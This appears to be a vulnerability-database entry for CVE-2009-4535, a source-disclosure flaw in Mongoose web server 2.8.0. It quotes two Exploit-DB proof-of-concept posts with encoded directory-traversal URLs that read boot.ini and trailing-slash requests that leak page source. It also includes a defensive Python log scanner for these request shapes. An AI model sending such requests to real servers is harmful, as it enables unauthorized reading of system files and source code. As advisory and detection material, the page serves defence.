CVE-2009-4535
Published: 2009-12-31
CVE-2009-4535: Mongoose 2.8.0 and earlier allows remote attackers to obtain the source code for a web page by appending a / (slash) character to the URI.
Priority: P4 · 30 · medium · CVSS 2.0: 5
AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 6.68% (93.1th percentile)
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| valenok | mongoose | <= 2.8.0 | — |
No detection rules found.
Exploit-DB
Mongoose Web Server 2.8 - Multiple Directory Traversals
exploitdb·2010-04-20
---
################################################################
#
# Mongoose Web Server v2.8 Multiple Directory Traversal Exploits
# Found By: Dr_IDE
# Date: Apr. 20, 2010
# Tested On: Windows 7
# Download: http://code.google.com/p/mongoose/downloads/list
#
################################################################
- Description -
Mongoose v2.8 is a Windows based HTTP server. This is the latest
version of the application available.
Mongoose v2.8 is vulnerable to many remote directory traversal attacks.
- Technical Details -
http://172.16.2.102//..%5C..%5C%5C..%5C..%5C%5C..%5C..%5C%5C..%5C..%5Cboot.ini
http://172.16.2.102/..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
http://172.16.2.102/..%5C..%5Cboot.ini
#[pocoftheday.
Exploit-DB
Mongoose Web Server 2.8 - Source Disclosure
exploitdb·2009-10-23
---
#######################################################
#
# Mongoose Web Server <= 2.8.0 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: http://code.google.com/p/mongoose/
#
#######################################################
- Description -
Mongoose Web Server <= 2.8.0 is a Windows based HTTP server.
This is the latest version of the application available.
Mongoose is vulnerable to remote arbitrary source code
disclosure by the following means.
- Technical Details -
http://[ webserver IP][:port]/[ file ][/]
http://172.16.2.101:8080/index.html/
http://172.16.2.101:8080/index.php/
#[pocoftheday.blogspot.com]
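A log check for the two request shapes the advisories above describe (a file name followed by a trailing slash, and encoded `..` path segments), as an added example that is not part of the CVE record or the Exploit-DB posts. The combined-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined-log style, documentation IPs).
SAMPLE_LOG = """\
198.51.100.7 - - [23/Oct/2009:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512
198.51.100.7 - - [23/Oct/2009:10:00:02 +0000] "GET /index.php/ HTTP/1.1" 200 2048
198.51.100.7 - - [23/Oct/2009:10:00:03 +0000] "GET /docs/ HTTP/1.1" 200 900
198.51.100.9 - - [20/Apr/2010:09:12:44 +0000] "GET /..%5C..%5Cboot.ini HTTP/1.1" 200 211
198.51.100.9 - - [20/Apr/2010:09:12:45 +0000] "GET /..%2f..%2fboot.ini HTTP/1.1" 404 0
198.51.100.3 - - [20/Apr/2010:09:13:00 +0000] "GET /v1.2/notes..txt HTTP/1.1" 200 77
"""

REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+" (\d{3})')
# A last segment that looks like "name.ext" followed by one or more slashes.
# A directory whose name contains a dot (e.g. /v1.2/) also matches, so treat
# hits as leads to review against the document root, not as confirmed abuse.
FILE_THEN_SLASH = re.compile(r'/[^/]+\.[A-Za-z0-9]{1,5}/+$')

def classify(raw_target):
    """Return the suspicious shapes found in one request target."""
    path = raw_target.split("?", 1)[0]
    prev = None
    while prev != path:  # decode until stable so double encoding cannot hide ".."
        prev, path = path, unquote(path)
    findings = []
    # Split on both separators: Windows accepts "\" as well as "/".
    if ".." in re.split(r'[/\\]+', path):
        findings.append("traversal")
    if FILE_THEN_SLASH.search(path.replace("\\", "/")):
        findings.append("file-with-trailing-slash")
    return findings

def scan(log_text):
    """Return (target, status, findings) for every flagged request line."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.search(line)
        if not m:
            continue
        findings = classify(m.group(1))
        if findings:
            hits.append((m.group(1), int(m.group(2)), findings))
    return hits

if __name__ == "__main__":
    for target, status, findings in scan(SAMPLE_LOG):
        print(status, target, ",".join(findings))
```

A flagged request answered with status 200 is the case to triage first, since it indicates the server returned content for that path.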
No writeups or analysis indexed.
http://freetexthost.com/0lcsrgt3vw
http://pocoftheday.blogspot.com/2009/10/mongoose-web-server-v280-remote-source_22.html
http://secunia.com/advisories/36934